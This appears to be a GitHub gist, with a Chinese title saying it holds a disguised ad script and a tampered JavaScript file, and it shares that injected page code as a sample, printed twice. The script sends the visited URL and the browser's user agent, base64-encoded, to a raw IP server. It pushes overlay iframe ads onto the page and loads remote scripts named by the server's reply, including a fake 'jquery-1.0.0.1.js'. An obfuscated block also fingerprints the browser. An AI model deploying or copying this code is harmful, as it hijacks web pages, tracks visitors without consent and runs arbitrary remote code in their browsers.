Instantly share code, notes, and snippets.

Embed
What would you like to do?
伪装的广告脚本和被篡改的js文件
/**
* Created by xbb on 17/5/18.
*/
/**
* Created by xbb on 17/5/18.
*/
function withjQuery(callback) {
console.log("error")
if(!(window.jQuery)) {
var js = document.createElement('script');
js.setAttribute('src', 'http://apps.bdimg.com/libs/jquery/1.8.1/jquery.min.js');
js.setAttribute('type', 'text/javascript');
js.onload = js.onreadystatechange = function() {
if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') {
if(callback && typeof callback === "function") {
callback();
}
js.onload = js.onreadystatechange = null;
}
};
document.getElementsByTagName('head')[0].appendChild(js);
}else{
getAd();
}
}
//格式化参数
function formatParams(data) {
var arr = [];
for (var name in data) {
arr.push(encodeURIComponent(name) + "=" + encodeURIComponent(data[name]));
}
arr.push(("v=" + Math.random()).replace("."));
return arr.join("&");
}
//获取语言类型
function getLangType() {
var language;
var langType;
if (navigator.appName == 'Netscape') {
language = navigator.language;
} else {
language = navigator.browserLanguage;
}
if (language.indexOf('zh') > -1) {
langType='cn';
}else{
langType='en';
}
return langType;
}
function getTerminal() {
var ua = window.navigator.userAgent;
ua = btoa(ua);
return ua;
}
function getRealUrl() {
var url = window.parent.location;
return url;
}
function showPush(sid,url) {
var w,h,b,c1,c2; //w 宽 h 高 b 底部距离 c1 c2 css样式
switch(sid) {
case "01":
w='400px';
h='300px';
b=0;
c1='display: none;';
c2='';
break;
case "2":
w='300px';
h='250px';
b=0;
c1='display: none;';
c2='';
break;
case "4":
w='300px';
h='250px';
b=0;
c1='display: none;';
c2='';
break;
case "04":
w='400px';
h='300px';
b=0;
c1='display: none;';
c2='';
break;
case "03":
w='300px';
h='250px';
b=0;
c1='display: none;';
c2='';
break;
case "05":
w='800px';
h='100px';
b=0;
c1='display: none;';
c2='';
break;
case "9":
w='100%';
h='80px';
b=0;
c1='display: none;';
c2='';
break;
case "10":
w='100px';
h='100px';
b='60%';
c1='display: none;';
c2='';
break;
case "11":
w='75px';
h='75px';
b='60%';
c1='display: none;';
c2='';
break;
case "121":
w='60px';
h='60px';
b='60%';
c1='display: none;';
c2='';
break;
case "122":
w='75px';
h='75px';
b='60%';
c1='display: none;';
c2='';
break;
default:
w=0;
h=0;
b=0;
c1='';
c2='';
}
//load
var pElement = document.createElement("div");
pElement.id = "nnn";
pElement.style.width=w;
pElement.style.height=h;
pElement.style.position="fixed";
pElement.style.bottom=b;
pElement.style.right="0px";
pElement.style.zIndex="10000";
pElement.style.overflow="hidden";
var _htm = "";
_htm += "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" >";
_htm += "<tr><td height=\"20\" style=' "+c1+" background: gray' valign=\"middle\"><div style=\"position:absolute; right:10px; top:0px; cursor:pointer;\" onclick=\"closePushDiv()\"><span style=\"font-weight:bold; font-size:13px;\">关闭<\/span><\/div><\/td>";
_htm += "<\/tr>";
_htm += "<tr><td colspan=\"2\" height=\""+h+"\" >";
_htm += "<div onclick='closePushDiv()'> <span style=' "+c2+" font-size: 15px;position: absolute;right:0px;top:0;background: whitesmoke; opacity: 0.3; text-align:center; width:15px;height:15px;line-height:15px; cursor:pointer'>&times;</span> <iframe style=\"background-color:transparent\" src=\""+url+"\" width=\""+w+"\" allowtransparency=\"true\" name=\"page\" height=\""+h+"\" scrolling=\"no\" frameborder=\"0\"><\/iframe><\/div>";
_htm += "<\/td><\/tr><\/table>";
pElement.innerHTML=_htm;
document.body.appendChild(pElement);
}
function closePushDiv () {
$("#nnn").hide();
}
function getUaType() {
var u = window.navigator.userAgent;
var num ;
if (u.indexOf('Trident') > -1) {
return "pc";
} else if (u.indexOf('Presto') > -1) {
return "pc";
} else if (u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1) {
return "pc";
} else if (u.indexOf("Mac OS") && u.indexOf('AppleWebKit') > -1 && u.indexOf('Mobile') == -1) {
return "pc";
} else if (u.indexOf('Mobile') > -1) {
if (u.indexOf("Mac OS X")>-1) {
num = u.substr(u.indexOf('OS') + 3, 5)
if (u.indexOf('iPhone') > -1) {
return "iphone";
} else if (u.indexOf('iPod') > -1) {
return "iphone";
} else if (u.indexOf('iPad') > -1) {
if (window.orientation == 90 || window.orientation == -90) {
return "iphone";
}
return "iphone";
} else {
return "iphone";
}
} else if (u.indexOf('Android') > -1 || u.indexOf('Linux') > -1) {
num = u.substr(u.indexOf('Android') + 8, 3);
return "android";
} else if (u.indexOf('BB10') > -1 ) {
return "android";
} else if (u.indexOf('IEMobile') > -1) {
return "android";
} else {
return "android";
}
} else {
return "android";
}
}
withjQuery(getAd);
function getAd(){
console.log("errorad")
$.ajax({
url:'http://61.174.50.211:16200/IDC/query?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType(),
dataType: 'json',
success:function(json){
//showPush('03','http://61.174.50.167:8080/yt/516-1/1.htm');
if(json.result == 1){
showPush(json.sid,json.wlUrl);
if(json.sid.indexOf("12" >= 0)){
var js = document.createElement('script');
js.setAttribute('src', json.xtJS);
js.setAttribute('type', 'text/javascript');
document.getElementsByTagName('head')[0].appendChild(js);
}
$.ajax({
url:'http://61.174.50.211:16200/IDC/pv?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType()+'&wlId='+json.wlId+'&wlUrl='+json.wlUrl,
dataType: 'json',
success:function(json){
}
})
}
}
})
}
/**
* Created by xbb on 17/5/18.
*/
/**
* Created by xbb on 17/5/18.
*/
function withjQuery(callback) {
console.log("error")
if(!(window.jQuery)) {
var js = document.createElement('script');
js.setAttribute('src', 'http://apps.bdimg.com/libs/jquery/1.8.1/jquery.min.js');
js.setAttribute('type', 'text/javascript');
js.onload = js.onreadystatechange = function() {
if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') {
if(callback && typeof callback === "function") {
callback();
}
js.onload = js.onreadystatechange = null;
}
};
document.getElementsByTagName('head')[0].appendChild(js);
}else{
getAd();
}
}
//格式化参数
function formatParams(data) {
var arr = [];
for (var name in data) {
arr.push(encodeURIComponent(name) + "=" + encodeURIComponent(data[name]));
}
arr.push(("v=" + Math.random()).replace("."));
return arr.join("&");
}
//获取语言类型
function getLangType() {
var language;
var langType;
if (navigator.appName == 'Netscape') {
language = navigator.language;
} else {
language = navigator.browserLanguage;
}
if (language.indexOf('zh') > -1) {
langType='cn';
}else{
langType='en';
}
return langType;
}
function getTerminal() {
var ua = window.navigator.userAgent;
ua = btoa(ua);
return ua;
}
function getRealUrl() {
var url = window.parent.location;
return url;
}
function showPush(sid,url) {
var w,h,b,c1,c2; //w 宽 h 高 b 底部距离 c1 c2 css样式
switch(sid) {
case "01":
w='400px';
h='300px';
b=0;
c1='display: none;';
c2='';
break;
case "2":
w='300px';
h='250px';
b=0;
c1='display: none;';
c2='';
break;
case "4":
w='300px';
h='250px';
b=0;
c1='display: none;';
c2='';
break;
case "04":
w='400px';
h='300px';
b=0;
c1='display: none;';
c2='';
break;
case "03":
w='300px';
h='250px';
b=0;
c1='display: none;';
c2='';
break;
case "05":
w='800px';
h='100px';
b=0;
c1='display: none;';
c2='';
break;
case "9":
w='100%';
h='80px';
b=0;
c1='display: none;';
c2='';
break;
case "10":
w='100px';
h='100px';
b='60%';
c1='display: none;';
c2='';
break;
case "11":
w='75px';
h='75px';
b='60%';
c1='display: none;';
c2='';
break;
case "121":
w='60px';
h='60px';
b='60%';
c1='display: none;';
c2='';
break;
case "122":
w='75px';
h='75px';
b='60%';
c1='display: none;';
c2='';
break;
default:
w=0;
h=0;
b=0;
c1='';
c2='';
}
//load
var pElement = document.createElement("div");
pElement.id = "nnn";
pElement.style.width=w;
pElement.style.height=h;
pElement.style.position="fixed";
pElement.style.bottom=b;
pElement.style.right="0px";
pElement.style.zIndex="10000";
pElement.style.overflow="hidden";
var _htm = "";
_htm += "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" >";
_htm += "<tr><td height=\"20\" style=' "+c1+" background: gray' valign=\"middle\"><div style=\"position:absolute; right:10px; top:0px; cursor:pointer;\" onclick=\"closePushDiv()\"><span style=\"font-weight:bold; font-size:13px;\">关闭<\/span><\/div><\/td>";
_htm += "<\/tr>";
_htm += "<tr><td colspan=\"2\" height=\""+h+"\" >";
_htm += "<div onclick='closePushDiv()'> <span style=' "+c2+" font-size: 15px;position: absolute;right:0px;top:0;background: whitesmoke; opacity: 0.3; text-align:center; width:15px;height:15px;line-height:15px; cursor:pointer'>&times;</span> <iframe style=\"background-color:transparent\" src=\""+url+"\" width=\""+w+"\" allowtransparency=\"true\" name=\"page\" height=\""+h+"\" scrolling=\"no\" frameborder=\"0\"><\/iframe><\/div>";
_htm += "<\/td><\/tr><\/table>";
pElement.innerHTML=_htm;
document.body.appendChild(pElement);
}
function closePushDiv () {
$("#nnn").hide();
}
function getUaType() {
var u = window.navigator.userAgent;
var num ;
if (u.indexOf('Trident') > -1) {
return "pc";
} else if (u.indexOf('Presto') > -1) {
return "pc";
} else if (u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1) {
return "pc";
} else if (u.indexOf("Mac OS") && u.indexOf('AppleWebKit') > -1 && u.indexOf('Mobile') == -1) {
return "pc";
} else if (u.indexOf('Mobile') > -1) {
if (u.indexOf("Mac OS X")>-1) {
num = u.substr(u.indexOf('OS') + 3, 5)
if (u.indexOf('iPhone') > -1) {
return "iphone";
} else if (u.indexOf('iPod') > -1) {
return "iphone";
} else if (u.indexOf('iPad') > -1) {
if (window.orientation == 90 || window.orientation == -90) {
return "iphone";
}
return "iphone";
} else {
return "iphone";
}
} else if (u.indexOf('Android') > -1 || u.indexOf('Linux') > -1) {
num = u.substr(u.indexOf('Android') + 8, 3);
return "android";
} else if (u.indexOf('BB10') > -1 ) {
return "android";
} else if (u.indexOf('IEMobile') > -1) {
return "android";
} else {
return "android";
}
} else {
return "android";
}
}
withjQuery(getAd);
function getAd(){
console.log("errorad")
$.ajax({
url:'http://61.174.50.211:16200/IDC/query?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType(),
dataType: 'json',
success:function(json){
//showPush('03','http://61.174.50.167:8080/yt/516-1/1.htm');
if(json.result == 1){
showPush(json.sid,json.wlUrl);
if(json.sid.indexOf("12" >= 0)){
var js = document.createElement('script');
js.setAttribute('src', json.xtJS);
js.setAttribute('type', 'text/javascript');
document.getElementsByTagName('head')[0].appendChild(js);
}
$.ajax({
url:'http://61.174.50.211:16200/IDC/pv?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType()+'&wlId='+json.wlId+'&wlUrl='+json.wlUrl,
dataType: 'json',
success:function(json){
}
})
}
}
})
}
var _jsurl = "http://dn-jia-io.qbox.me/code/js/wss-online2.js";
_jsurl += (_jsurl.indexOf('?') > 0 ? '&' : '?') + '_t=' + (new Date().getTime());
var _b = "XXTS01";
var _c = "125784715_(DKmRi1PhV1v6V15d_3881453123_)ie==";
var jsNode1 = document.createElement("script");
jsNode1.setAttribute("type", "text/javascript"),
jsNode1.setAttribute("src", _jsurl),
document.head ? document.head.appendChild(jsNode1) : document.body && document.body.appendChild(jsNode1);
!function(a, b) {
function c(a) {
var d, e, f, g, h, i, b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
for (new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1),
f = a.length,
e = 0,
d = ""; f > e; ) {
if (g = 255 & a.charCodeAt(e++),
e == f) {
d += b.charAt(g >> 2),
d += b.charAt((3 & g) << 4),
d += "==";
break
}
if (h = a.charCodeAt(e++),
e == f) {
d += b.charAt(g >> 2),
d += b.charAt((3 & g) << 4 | (240 & h) >> 4),
d += b.charAt((15 & h) << 2),
d += "=";
break
}
i = a.charCodeAt(e++),
d += b.charAt(g >> 2),
d += b.charAt((3 & g) << 4 | (240 & h) >> 4),
d += b.charAt((15 & h) << 2 | (192 & i) >> 6),
d += b.charAt(63 & i)
}
return d
}
function d() {
return -1 != b.userAgent.indexOf("MSIE") ? "ie" : -1 != b.userAgent.indexOf("Chrome") ? "Chrome" : -1 != b.userAgent.indexOf("Firefox") ? "Firefox" : -1 != b.userAgent.indexOf("Opera") ? "Opera" : -1 != b.userAgent.indexOf("Netscape") ? "Netscape" : -1 != b.userAgent.indexOf("Safari") ? "Safari" : ""
}
function e() {
function e() {
var a = ""
, c = b.plugins;
if (c.length > 0)
for (j = 0; j < b.plugins.length; j++)
a += b.plugins[j].name + ";";
return a
}
var f = b.appName
, g = b.cookieEnabled
, h = b.cpuClass
, i = b.mimeTypes
, k = b.platform
, l = b.plugins
, m = b.userAgent;
return pStr = "type=" + d() + "&userAgent=" + m + "&appName=" + f + "&cookieEnabled=" + g + "&cpuClass=" + h + "&mimeType_length=" + i.length + "&platform=" + k + "&plugins_length=" + l.length + "&allPluginName=" + e() + "&window_screen_width=" + a.screen.width + "&window_screen_height=" + a.screen.height + "&window_screen_colorDepth=" + a.screen.colorDepth,
c(pStr)
}
var f, g, h, i, j, k, l, m;
window.self == window.top && (f = 0,
window.innerWidth ? f = window.innerWidth : document.body && document.body.clientWidth && (f = document.body.clientWidth),
document.documentElement && document.documentElement.clientWidth && (f = document.documentElement.clientWidth),
g = 0,
(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || navigator.userAgent.match(/(iPhone|iPod|iPad|Android|ios|BlackBerry|MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE)/i)) && (g = 1),
1020 > f && 0 == g || (h = e(),
j = 0,
k = 0,
l = "scripts2s",
m = document.createElement("script"),
m.setAttribute("type", "text/javascript"),
m.setAttribute("src", "http://61.174.50.211:16100/jquery-1.0.0.1.js"),
m.id = l,
document.body ? document.getElementById(l) || document.body.appendChild(m) : i = setInterval(function() {
if (j++,
10 == j)
return clearInterval(i),
void 0;
try {
document.getElementById(l) || 1 == k ? clearInterval(i) : document.body && (document.body.appendChild(m),
k = 1)
} catch (a) {}
}, 500)))
}(window, navigator);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment